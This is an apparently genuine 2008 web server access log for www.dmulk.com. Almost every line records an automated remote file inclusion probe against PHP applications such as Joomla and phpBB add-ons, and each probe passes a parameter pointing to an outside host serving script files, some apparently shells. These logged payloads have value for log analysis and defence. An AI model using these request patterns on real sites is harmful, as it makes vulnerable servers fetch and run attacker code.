72.29.83.181 - - [31/Jan/2008:08:12:22 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.29.83.181 - - [31/Jan/2008:08:12:22 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.117.248.130 - - [31/Jan/2008:08:12:54 -0800] "GET /scanhttp://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:12:58 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:12:58 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:12:58 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:13:00 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.224.58 - - [31/Jan/2008:08:13:53 -0800] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://la.gg/upl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.200.224.58 - - [31/Jan/2008:08:13:53 -0800] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://la.gg/upl/test_1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.6.25.143 - - [31/Jan/2008:08:15:17 -0800] "GET /logs/access_080110.log HTTP/1.0" 200 682778 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.47.80.39 - - [31/Jan/2008:08:15:25 -0800] "GET /funny/ HTTP/1.1" 200 812 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:15:28 -0800] "GET /logs/access_071202.log//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:15:28 -0800] "GET //path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:15:28 -0800] "GET /logs//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.161.236.45 - - [31/Jan/2008:08:15:56 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [31/Jan/2008:08:15:57 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [31/Jan/2008:08:15:57 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.117.248.130 - - [31/Jan/2008:08:16:06 -0800] "GET /logs/access_080103.log/scanhttp://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.248.130 - - [31/Jan/2008:08:16:07 -0800] "GET /logs/scanhttp://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:16:12 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:16:18 -0800] "GET /logs/access_071219.log//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:16:25 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:16:25 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:16:25 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:16:27 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.81.88.20 - - [31/Jan/2008:08:18:18 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.58.130 - - [31/Jan/2008:08:20:02 -0800] "GET /logs/access_071230.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.58.130 - - [31/Jan/2008:08:20:02 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:21:08 -0800] "GET /logs/access_071230.log//includes/functions_mod_user.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:21:08 -0800] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:21:09 -0800] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:22:36 -0800] "GET /logs/access_071229.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:22:36 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:22:37 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:08:22:44 -0800] "GET /logs/access_080117.log//mcf.php?content=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:08:22:44 -0800] "GET //mcf.php?content=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:08:22:45 -0800] "GET /logs//mcf.php?content=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.31.242.2 - - [31/Jan/2008:08:24:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
194.31.242.2 - - [31/Jan/2008:08:24:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:08:24:45 -0800] "GET /logs/access_071230.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.167.199.194 - - [31/Jan/2008:08:25:35 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.167.199.194 - - [31/Jan/2008:08:25:36 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.167.199.194 - - [31/Jan/2008:08:25:36 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.135.109.228 - - [31/Jan/2008:08:26:03 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [31/Jan/2008:08:26:04 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [31/Jan/2008:08:26:05 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.161 - - [31/Jan/2008:08:26:28 -0800] "GET /megumi/Bracelet/?N=D HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:08:27:15 -0800] "GET /logs/access_071228.log//naboard_pnr.php?skin=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:08:27:15 -0800] "GET //naboard_pnr.php?skin=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:08:27:16 -0800] "GET /logs//naboard_pnr.php?skin=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.81.88.20 - - [31/Jan/2008:08:27:40 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.81.88.20 - - [31/Jan/2008:08:27:40 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.81.88.20 - - [31/Jan/2008:08:27:40 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:30:18 -0800] "GET /logs/access_080117.log//mcf.php?content=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:30:19 -0800] "GET //mcf.php?content=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:30:19 -0800] "GET /logs//mcf.php?content=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:08:30:25 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:08:30:25 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:08:30:25 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:08:31:13 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:08:31:13 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:08:31:13 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:31:30 -0800] "GET /logs/access_071230.log//includes/functions_mod_user.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:31:31 -0800] "GET //includes/functions_mod_user.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:31:31 -0800] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [31/Jan/2008:08:31:57 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.radioung.no/pics/www/chika???????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [31/Jan/2008:08:32:03 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.radioung.no/pics/www/chika???????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [31/Jan/2008:08:32:08 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.radioung.no/pics/www/chika???????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.97.55 - - [31/Jan/2008:08:32:47 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.89 - - [31/Jan/2008:08:33:06 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:33:57 -0800] "GET /logs/access_071228.log//naboard_pnr.php?skin=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:33:57 -0800] "GET //naboard_pnr.php?skin=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:08:33:58 -0800] "GET /logs//naboard_pnr.php?skin=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.242.50 - - [31/Jan/2008:08:34:13 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
66.45.242.50 - - [31/Jan/2008:08:34:14 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:34:52 -0800] "GET /logs/access_071230.log//project/showfiles.php?group_id=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.206.51 - - [31/Jan/2008:08:34:54 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://207.234.131.32:32000/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
203.130.206.51 - - [31/Jan/2008:08:34:54 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://207.234.131.32:32000/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:34:55 -0800] "GET //project/showfiles.php?group_id=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [31/Jan/2008:08:34:55 -0800] "GET /logs//project/showfiles.php?group_id=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:08:35:06 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:08:35:10 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:08:35:11 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.72.151 - - [31/Jan/2008:08:35:30 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.243.64.123 - - [31/Jan/2008:08:35:54 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
125.243.64.123 - - [31/Jan/2008:08:35:55 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:08:36:58 -0800] "GET /logs//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [31/Jan/2008:08:36:59 -0800] "GET //path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.117.248.130 - - [31/Jan/2008:08:37:00 -0800] "GET /logs/access_071218.log/scanhttp://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.63.186 - - [31/Jan/2008:08:38:34 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://www.radioung.no/pics/www/chika???????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:08:38:48 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.55 - - [31/Jan/2008:08:39:24 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.55 - - [31/Jan/2008:08:39:24 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:08:39:33 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:08:39:33 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:08:39:34 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.34.10 - - [31/Jan/2008:08:39:51 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.34.10 - - [31/Jan/2008:08:39:51 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.34.10 - - [31/Jan/2008:08:39:51 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.45.176.234 - - [31/Jan/2008:08:41:38 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.45.176.234 - - [31/Jan/2008:08:41:39 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:08:42:36 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.216.127.15 - - [31/Jan/2008:08:43:08 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.216.127.15 - - [31/Jan/2008:08:43:08 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.216.127.15 - - [31/Jan/2008:08:43:08 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.44.94 - - [31/Jan/2008:08:43:18 -0800] "GET /logs/access.log HTTP/1.0" 200 172233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.17.248.74 - - [31/Jan/2008:08:44:20 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
210.17.248.74 - - [31/Jan/2008:08:44:20 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.101.20.178 - - [31/Jan/2008:08:46:14 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
208.101.20.178 - - [31/Jan/2008:08:46:14 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://h1.ripway.com/credo/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
66.216.127.15 - - [31/Jan/2008:08:48:42 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:08:48:52 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:08:48:53 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:08:48:54 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:08:49:08 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [31/Jan/2008:08:49:08 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://4saltwater.com/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.72.184.250 - - [31/Jan/2008:08:50:30 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
